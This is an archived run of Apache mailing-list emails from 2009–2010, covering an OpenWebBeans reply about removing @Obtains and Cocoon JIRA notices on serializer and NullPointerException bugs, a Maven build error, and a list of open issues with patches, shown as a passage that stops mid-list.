Delivered-To: [email protected] Received: (qmail 82255 invoked by uid 500); 26 Jun 2009 05:54:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82245 invoked by uid 99); 26 Jun 2009 05:54:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Jun 2009 05:54:46 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f221.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Jun 2009 05:54:38 +0000 Received: by ewy21 with SMTP id 21so852845ewy.12 for <[email protected]>; Thu, 25 Jun 2009 22:54:17 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=1ZSlih9w9y5zUq78tqdneezgA/FeAoxLGAKsPbvypoI=; b=rAZmprJnq09nOaA2RT/kAw6I17SXJCrwQJEFS5W+AsF3fgBYZW/Jk2Cw9UHFstmfqC avlQ4jauOA9AHy+lrcYni3m+dG3xZ76zqfbaNGFozwcdfhT9a+utbHRJSG+kmjHcFxZw yodMvWnszxxlxWquvLNiMMV0flPEJFBkLGB90= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=X0QKStZ8C5rOz4/egxQu24kZwoLOyN35u0T8y1VD0chSZoetJ3PLBngBGVc4uPbLEX oIXFVts3foCDTrZ4vAj6/JgklngFElQSk5sPaTWsSndjtkMj0na7IPhQPAbr/9TF7L9W 0uKh1W28/sm5B32vmoDvDxTBpXqNL/JG0u+DU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id e16mr3799719ebp.86.1245995657282; Thu, 25 Jun 2009 22:54:17 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Fri, 26 Jun 2009 08:54:17 +0300 Message-ID: <[email protected]> Subject: Re: javax.inject.Obtains From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c43108b43f9046d39f81e X-Virus-Checked: Checked by ClamAV on apache.org --0015174c43108b43f9046d39f81e Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Yes. Currently, I am refactoring injection resolution for using Generic types. After that we can begin to tweak code for those changes. Please, create Jira issue for those if not already created. Thanks; --Gurkan 2009/6/26 Mark Struberg <[email protected]> > > Hi! > > So far I've seen the whole @Obtains has been dropped. > I personally think this is a good thing, because one can easily work around > this by actually writing down the realm class instead of annotating it with > @Obtains 'therealclass' ;) > > So I think we can simply slaughter out all the Obtains stuff from the API, > the DefinitionUtil and others? > > txs and LieGrue, > strub > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c43108b43f9046d39f81e--
From [email protected] Tue Feb 02 17:46:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50924 invoked from network); 2 Feb 2010 17:46:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Feb 2010 17:46:46 -0000 Received: (qmail 66516 invoked by uid 500); 2 Feb 2010 17:46:45 -0000 Delivered-To: [email protected] Received: (qmail 66113 invoked by uid 500); 2 Feb 2010 17:46:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 65804 invoked by uid 99); 2 Feb 2010 17:46:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Feb 2010 17:46:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Feb 2010 17:46:42 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C7F9F234C1F2 for <[email protected]>; Tue, 2 Feb 2010 09:46:20 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 2 Feb 2010 17:46:20 +0000 (UTC) From: "Charles Yates (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON3-52) XMLSerializer setup method resets output method to xml MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org XMLSerializer setup method resets output method to xml ------------------------------------------------------ Key: COCOON3-52 URL: https://issues.apache.org/jira/browse/COCOON3-52 Project: Cocoon 3 Issue Type: Bug Components: cocoon-sax Affects Versions: 3.0.0-alpha-3 Reporter: Charles Yates Assignee: Cocoon Developers Team When checking for a null 'method' property in the format Properties object the incorrect key 'format' is used instead of 'method', returning null. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Feb 02 17:48:43 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52130 invoked from network); 2 Feb 2010 17:48:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Feb 2010 17:48:42 -0000 Received: (qmail 72407 invoked by uid 500); 2 Feb 2010 17:48:42 -0000 Delivered-To: [email protected] Received: (qmail 72317 invoked by uid 500); 2 Feb 2010 17:48:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 72309 invoked by uid 99); 2 Feb 2010 17:48:42 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Feb 2010 17:48:42 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Feb 2010 17:48:40 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F3C2B234C1F2 for <[email protected]>; Tue, 2 Feb 2010 09:48:18 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 2 Feb 2010 17:48:18 +0000 (UTC) From: "Charles Yates (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON3-52) XMLSerializer setup method resets output method to xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON3-52?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Charles Yates updated COCOON3-52: --------------------------------- Attachment: COCOON3-52.txt > XMLSerializer setup method resets output method to xml > ------------------------------------------------------ > > Key: COCOON3-52 > URL: https://issues.apache.org/jira/browse/COCOON3-52 > Project: Cocoon 3 > Issue Type: Bug > Components: cocoon-sax > Affects Versions: 3.0.0-alpha-3 > Reporter: Charles Yates > Assignee: Cocoon Developers Team > Attachments: COCOON3-52.txt > > > When checking for a null 'method' property in the format Properties object the incorrect key 'format' is used instead of 'method', returning null. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Feb 03 07:33:52 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99111 invoked from network); 3 Feb 2010 07:33:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 07:33:51 -0000 Received: (qmail 34463 invoked by uid 500); 3 Feb 2010 07:33:51 -0000 Delivered-To: [email protected] Received: (qmail 34384 invoked by uid 500); 3 Feb 2010 07:33:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 34376 invoked by uid 99); 3 Feb 2010 07:33:49 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 07:33:49 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 07:33:40 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1D121234C4A9 for <[email protected]>; Tue, 2 Feb 2010 23:33:19 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 3 Feb 2010 07:33:19 +0000 (UTC) From: "Gabriel Gruber (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2277) NPE in DynamicURLStreamHandlerFactory (Cocoon JNET) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org NPE in DynamicURLStreamHandlerFactory (Cocoon JNET) --------------------------------------------------- Key: COCOON-2277 URL: https://issues.apache.org/jira/browse/COCOON-2277 Project: Cocoon Issue Type: Bug Components: * Cocoon Core, - Servlet service framework Affects Versions: 2.2-dev (Current SVN) Reporter: Gabriel Gruber Priority: Critical >From time to time after more heavy of our cocoon 2.2 based application (which is not yet in production) I am getting this exception from cocoon jnet. after this exception occurs we have to restart the web application as this exception keeps coming and noone can do anything with the webapp.... java.lang.NullPointerException java.util.LinkedList.remove(LinkedList.java:646) java.util.LinkedList.remove(LinkedList.java:360) org.apache.cocoon.jnet.DynamicURLStreamHandlerFactory.pop(DynamicURLStreamHandlerFactory.java:30) org.apache.cocoon.jnet.URLHandlerFactoryCollector.popUrlHandlerFactories(URLHandlerFactoryCollector.java:57) org.apache.cocoon.jnet.URLHandlerFactoryCollector.installURLHandlers(URLHandlerFactoryCollector.java:39) sun.reflect.GeneratedMethodAccessor516.invoke(Unknown Source) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:627) org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:616) org.springframework.aop.aspectj.AspectJAroundAdvice.invoke(AspectJAroundAdvice.java:64) org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171) org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171) org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204) $Proxy34.service(Unknown Source) org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:481) org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:455) org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:245) org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171) org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204) $Proxy94.service(Unknown Source) org.apache.cocoon.servletservice.DispatcherServlet.service(DispatcherServlet.java:106) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) org.apache.cocoon.servlet.multipart.MultipartFilter.doFilter(MultipartFilter.java:131) *NOTE* that another open source project reported similar problems: http://jira.dspace.org/jira/browse/DS-253?page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Feb 03 09:20:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23942 invoked from network); 3 Feb 2010 09:20:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 09:20:34 -0000 Received: (qmail 72677 invoked by uid 500); 3 Feb 2010 09:20:33 -0000 Delivered-To: [email protected] Received: (qmail 72581 invoked by uid 500); 3 Feb 2010 09:20:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 72573 invoked by uid 99); 3 Feb 2010 09:20:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 09:20:32 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 09:20:24 +0000 Received: by ewy7 with SMTP id 7so1132686ewy.10 for <[email protected]>; Wed, 03 Feb 2010 01:20:04 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=Rd2W1+XN5ZEq7F1DaYDx2feFH0OjgmXTYruzB7Udnvk=; b=CD1WL5iHO9Oo6XmMKqdi+0S0VCPbPOsmEcq3WKgjrlEoC4wPsFCxniOLAMfqagedyN 52OyX4eaFEnGHFrkpxvsbw48asoP0/JoN8Qy7ASksKRhgGvnIBdnMCAKCPuJdSzvKFwn EFfXt3RRBoXARWvpAnBvv4XxnBHIruh0/1RDs= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=BEEtVrEM85w0xM3rW9iFn3dg48yvH+YT8ULcUZSkX3V7geIGjDiTPi3ye1NZtWugGI KPYccoYyNYXw67Apfvo7sVoWOkJ4b99I5ttCXClrNV0D76qQECWEecgXaxXDcHoQ/D8P o9UeCOWUYUxX/ndeFFhJyDcJbCMER3WCb6pcA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id w4mr1829005ebn.53.1265188804305; Wed, 03 Feb 2010 01:20:04 -0800 (PST) Date: Wed, 3 Feb 2010 10:20:04 +0100 Message-ID: <[email protected]> Subject: [Cocoon 3] cocoon-sax build error From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00504502cfa8412707047eaeb9e6 X-Virus-Checked: Checked by ClamAV on apache.org --00504502cfa8412707047eaeb9e6 Content-Type: text/plain; charset=UTF-8 Hi all guys, I've some problem in building the cocoon-sax modules using the m2eclipse plugin for eclipse (I'm not using the built-in maven3, but linked my own 2.2.1), the error message I get is: 2/3/10 10:12:52 AM CET: Build error for /cocoon-sax/pom.xml; org.apache.maven.project.ProjectBuildingException: Some problems were encountered while processing the POMs: [ERROR] 'dependencyManagement.dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: org.springframework:spring-context:jar -> duplicate declaration of version 2.5.6 @ org.apache.cocoon.parent:cocoon-parent:3.0.0-alpha-3-SNAPSHOT, /Users/simone/Documents/workspace-cocoon3/cocoon-root/parent/pom.xml Do have you experienced the same? If not, which settings I've to take care to avoid it? Thanks in advance, have a nice day :) Simo http://people.apache.org/~simonetripodi/ --00504502cfa8412707047eaeb9e6 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <font face=3D"courier new,monospace"><div><font face=3D"courier new,monospa= ce">Hi all guys,</font></div><div><font face=3D"courier new,monospace">I&#3= 9;ve some problem in building the cocoon-sax modules using the m2eclipse pl= ugin for eclipse (I&#39;m not using the built-in maven3, but linked my own = 2.2.1), the error message I get is:</font></div> <div><font face=3D"courier new,monospace"><br></font></div><div><font face= =3D"courier new,monospace"><div>2/3/10 10:12:52 AM CET: Build error for /co= coon-sax/pom.xml; org.apache.maven.project.ProjectBuildingException: Some p= roblems were encountered while processing the POMs:</div> <div>[ERROR] &#39;dependencyManagement.dependencies.dependency.(groupId:art= ifactId:type:classifier)&#39; must be unique: org.springframework:spring-co= ntext:jar -&gt; duplicate declaration of version 2.5.6 @ org.apache.cocoon.= parent:cocoon-parent:3.0.0-alpha-3-SNAPSHOT, /Users/simone/Documents/worksp= ace-cocoon3/cocoon-root/parent/pom.xml</div> </font></div><div><font face=3D"courier new,monospace"><br></font></div><di= v>Do have you experienced the same? If not, which settings I&#39;ve to take= care to avoid it?</div><div>Thanks in advance, have a nice day :)</div><di= v> Simo</div><br clear=3D"all"></font><a href=3D"http://people.apache.org/~sim= onetripodi/">http://people.apache.org/~simonetripodi/</a><br> --00504502cfa8412707047eaeb9e6-- From [email protected] Wed Feb 03 10:41:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64372 invoked from network); 3 Feb 2010 10:41:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Feb 2010 10:41:54 -0000 Received: (qmail 77798 invoked by uid 500); 3 Feb 2010 10:41:54 -0000 Delivered-To: [email protected] Received: (qmail 77707 invoked by uid 500); 3 Feb 2010 10:41:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 77699 invoked by uid 99); 3 Feb 2010 10:41:53 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 10:41:53 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Feb 2010 10:41:50 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 59E2A234C1EF for <[email protected]>; Wed, 3 Feb 2010 02:41:29 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 3 Feb 2010 10:41:29 +0000 (UTC) From: [email protected] To: [email protected] Subject: [jira] Subscription: COCOON-open-with-patch MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Issue Subscription Filter: COCOON-open-with-patch (110 issues) Subscriber: cocoon Key Summary COCOON-2268 To extend the image reader we need to change the visibility to the parameter of the ImageReader https://issues.apache.org/jira/browse/COCOON-2268 COCOON-2262 container.refresh() is called before embeddedServlet.init() https://issues.apache.org/jira/browse/COCOON-2262 COCOON-2260 wrong parent version in pom of cocoon-flowscript-impl https://issues.apache.org/jira/browse/COCOON-2260 COCOON-2259 Memory leak in PoolableProxyHandler https://issues.apache.org/jira/browse/COCOON-2259 COCOON-2250 Wrong error message in Element.java (jx:element) https://issues.apache.org/jira/browse/COCOON-2250 COCOON-2249 XHTMLSerializer uses entity references &quot; and &apos; which cause JavaScript parse errors https://issues.apache.org/jira/browse/COCOON-2249 COCOON-2246 HttpRequest should handle encoding in getParameter and getParameterValues in the same way https://issues.apache.org/jira/browse/COCOON-2246 COCOON-2233 Update archetypes to current trunk artifact versions https://issues.apache.org/jira/browse/COCOON-2233 COCOON-2222 Add SaxParser configuration properties https://issues.apache.org/jira/browse/COCOON-2222 COCOON-2216 IncludeCacheManager can not perfom parallel includes https://issues.apache.org/jira/browse/COCOON-2216 COCOON-2212 jx:attribute does not check name is correct before proceeding https://issues.apache.org/jira/browse/COCOON-2212 COCOON-2197 Making the cocoon-auth-block acegi-security-sample work https://issues.apache.org/jira/browse/COCOON-2197 COCOON-2173 AbstractCachingProcessingPipeline: Two requests can deadlock each other https://issues.apache.org/jira/browse/COCOON-2173 COCOON-2162 [PATCH] Fix for Paginator when accessing out of bounds Pagination page https://issues.apache.org/jira/browse/COCOON-2162 COCOON-2137 XSD Schemas for CForms Development https://issues.apache.org/jira/browse/COCOON-2137 COCOON-2114 fix sorting in TraversableGenerator https://issues.apache.org/jira/browse/COCOON-2114 COCOON-2108 xmodule:flow-attr Does not accept document objects https://issues.apache.org/jira/browse/COCOON-2108 COCOON-2104 [PATCH] Add base URI fixup support to XIncludeTransformer https://issues.apache.org/jira/browse/COCOON-2104 COCOON-2100 Retrieving mimeType returned by pipeline executed from Flow https://issues.apache.org/jira/browse/COCOON-2100 COCOON-2041 WebDAV Returns improper status on PUT https://issues.apache.org/jira/browse/COCOON-2041 COCOON-2040 Union widget does not work with booleanfield set as case widget https://issues.apache.org/jira/browse/COCOON-2040 COCOON-2037 New DynamicGroup widget https://issues.apache.org/jira/browse/COCOON-2037 COCOON-2035 NPE in the sorter of the EnhancedRepeater https://issues.apache.org/jira/browse/COCOON-2035 COCOON-2032 [PATCH] Sort order in paginated repeater https://issues.apache.org/jira/browse/COCOON-2032 COCOON-2030 submit-on-change doesn't work for a multivaluefield with list-type="checkbox" https://issues.apache.org/jira/browse/COCOON-2030 COCOON-2018 Use thread context class loader to load custom binding classes https://issues.apache.org/jira/browse/COCOON-2018 COCOON-2017 More output beautification options for serializers https://issues.apache.org/jira/browse/COCOON-2017 COCOON-2015 Doctype added twice because root element (html) is inlined https://issues.apache.org/jira/browse/COCOON-2015 COCOON-2002 HTML transformer only works with latin-1 characters https://issues.apache.org/jira/browse/COCOON-2002 COCOON-1974 Donating ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1974 COCOON-1973 CaptchaValidator: allow case-insensitive matching https://issues.apache.org/jira/browse/COCOON-1973 COCOON-1964 Redirects inside a block called via the servlet protocol fail https://issues.apache.org/jira/browse/COCOON-1964 COCOON-1963 Add a redirect action to the browser update handler https://issues.apache.org/jira/browse/COCOON-1963 COCOON-1960 Pipeline errors for "generator/reader already set" should provide more information https://issues.apache.org/jira/browse/COCOON-1960 COCOON-1949 [PATCH] load flowscript from file into specified Rhino context object https://issues.apache.org/jira/browse/COCOON-1949 COCOON-1946 [PATCH] - Javaflow Sample errors trying to enhance Javaflow classes and showing cform templates https://issues.apache.org/jira/browse/COCOON-1946 COCOON-1943 [Patch] Parameters in blocks-protocol URIs get decoded too early https://issues.apache.org/jira/browse/COCOON-1943 COCOON-1932 [PATCH] correct styling of disabled suggestion lists https://issues.apache.org/jira/browse/COCOON-1932 COCOON-1929 [PATCH] Reloading classloader in Cocoon 2.2 https://issues.apache.org/jira/browse/COCOON-1929 COCOON-1917 Request Encoding problem: multipart/form vs. url encoded https://issues.apache.org/jira/browse/COCOON-1917 COCOON-1915 Nullable value with additional String or XMLizable in JavaSelectionList https://issues.apache.org/jira/browse/COCOON-1915 COCOON-1914 Text as XMLizable in EmptySelectionList https://issues.apache.org/jira/browse/COCOON-1914 COCOON-1899 [PATCH] Cocoon XML:DB Implementation should not depend on Xindice https://issues.apache.org/jira/browse/COCOON-1899 COCOON-1898 [PATCH] XPatch support for maven-cocoon-deployer-plugin https://issues.apache.org/jira/browse/COCOON-1898 COCOON-1893 XML-Binding: Problem creating a new element https://issues.apache.org/jira/browse/COCOON-1893 COCOON-1877 [PATCH] Pageable Repeater https://issues.apache.org/jira/browse/COCOON-1877 COCOON-1870 Lucene block does not store attributes when instructed so https://issues.apache.org/jira/browse/COCOON-1870 COCOON-1846 [PATCH] BooleanField and radio do not send on-value-changed at the rigth time with IE https://issues.apache.org/jira/browse/COCOON-1846 COCOON-1843 LDAPTransformer: add-entry tag doesn't work https://issues.apache.org/jira/browse/COCOON-1843 COCOON-1842 LDAPTransformer: ClassCastException with Binary fields https://issues.apache.org/jira/browse/COCOON-1842 COCOON-1810 [PATCH] JMSEventMessageListener does not work https://issues.apache.org/jira/browse/COCOON-1810 COCOON-1807 Workaround for IE Bug in <button> https://issues.apache.org/jira/browse/COCOON-1807 COCOON-1794 [PATCH] Propagation of namespaces to a repeaters child bindings and implementation of a move-node binding https://issues.apache.org/jira/browse/COCOON-1794 COCOON-1738 double-listbox problem in repeaters https://issues.apache.org/jira/browse/COCOON-1738 COCOON-1726 Implementation of Source that supports conditional GETs https://issues.apache.org/jira/browse/COCOON-1726 COCOON-1717 Use custom cache keys for caching uri coplets using input modules. https://issues.apache.org/jira/browse/COCOON-1717 COCOON-1697 Allow request parameters to be used in "for (var k in h)" kind of Javascript Loops https://issues.apache.org/jira/browse/COCOON-1697 COCOON-1648 Add support for ISO8601 in I18nTransformer and Forms https://issues.apache.org/jira/browse/COCOON-1648 COCOON-1618 [PATCH] SoapGenerator/Serializer for Axis Block https://issues.apache.org/jira/browse/COCOON-1618 COCOON-1611 [PATCH] Add additonal constructor to FormInstance.java to be able to pass a locale https://issues.apache.org/jira/browse/COCOON-1611 COCOON-1603 [PATCH] handling of alternatives in MailTransformer https://issues.apache.org/jira/browse/COCOON-1603 COCOON-1573 Improvement SetAttributeJXPathBinding and Contribution SetNodeValueJXPathBinding https://issues.apache.org/jira/browse/COCOON-1573 COCOON-1556 [PATCH] Add a JXPathConvertor for conversion betwean beans and Strings https://issues.apache.org/jira/browse/COCOON-1556 COCOON-1535 [PATCH] enhancement to {global:} input module: return all sitemap globals https://issues.apache.org/jira/browse/COCOON-1535 COCOON-1527 [PATCH] Cache control logic sheets for XSP to override getKey and getValidity https://issues.apache.org/jira/browse/COCOON-1527 COCOON-1526 [PATCH] processToDOM returns a read-only DOM https://issues.apache.org/jira/browse/COCOON-1526 COCOON-1519 [PATCH] TeeTransformer refactoring https://issues.apache.org/jira/browse/COCOON-1519 COCOON-1508 [PATCH] Avalonize TranscoderFactory https://issues.apache.org/jira/browse/COCOON-1508 COCOON-1506 [PATCH] Manually specifying a mounted sitemap's context https://issues.apache.org/jira/browse/COCOON-1506 COCOON-1488 [PATCH] htmlunit-based testing, needs to be ported to 2.2 https://issues.apache.org/jira/browse/COCOON-1488 COCOON-1467 ESQL exception handling problem https://issues.apache.org/jira/browse/COCOON-1467 COCOON-1439 [poi] vertical text orientation and font cache https://issues.apache.org/jira/browse/COCOON-1439 COCOON-1398 New CachingPortletAdapter https://issues.apache.org/jira/browse/COCOON-1398 COCOON-1395 [PATCH] Missing ContextAttributeInputModule https://issues.apache.org/jira/browse/COCOON-1395 COCOON-1394 [PATCH] Implementation of PortletRequest#getQueryString() https://issues.apache.org/jira/browse/COCOON-1394 COCOON-1384 [PATCH] flow redirector should allow explicit 'cocoon:' scheme https://issues.apache.org/jira/browse/COCOON-1384 COCOON-1370 [PATCH] proxy block can now use JTidy and handle multipart POST https://issues.apache.org/jira/browse/COCOON-1370 COCOON-1368 [PATCH] HTTPRequestTransformer https://issues.apache.org/jira/browse/COCOON-1368 COCOON-1362 [PATCH] log4j.xconf should have the same default config as logkit.xconf https://issues.apache.org/jira/browse/COCOON-1362 COCOON-1360 [patch] client side validation for CForms https://issues.apache.org/jira/browse/COCOON-1360 COCOON-1345 [PATCH] Extract convertors into their own block https://issues.apache.org/jira/browse/COCOON-1345 COCOON-1340 [PATCH] lucene block contribution : a AnalyzerManager component https://issues.apache.org/jira/browse/COCOON-1340 COCOON-1337 [PATCH] Suggestion for widget population https://issues.apache.org/jira/browse/COCOON-1337 COCOON-1336 [PATCH] PortletWindowAspect: hiding portlet mode icons and new feature "force-sizable" https://issues.apache.org/jira/browse/COCOON-1336 COCOON-1332 [PATCH] content-length and content-type for portlet ActionRequest https://issues.apache.org/jira/browse/COCOON-1332 COCOON-1329 [PATCH] Fix for cocoon.jar bundled in ear common for portal.war and portlet.war https://issues.apache.org/jira/browse/COCOON-1329 COCOON-1325 [PATCH] commons-fileupload based multipart parser https://issues.apache.org/jira/browse/COCOON-1325 COCOON-1302 [Patch] Word Document Generator https://issues.apache.org/jira/browse/COCOON-1302 COCOON-1295 ParallelContentAggregator, multithreaded aggregating https://issues.apache.org/jira/browse/COCOON-1295 COCOON-1260 [PATCH] MultipartParser can now handle multipart/mixed https://issues.apache.org/jira/browse/COCOON-1260 COCOON-1254 [Patch] OWQLTransformer + RDQLTransformer https://issues.apache.org/jira/browse/COCOON-1254 COCOON-1249 [Patch] XMLDBSource should accept 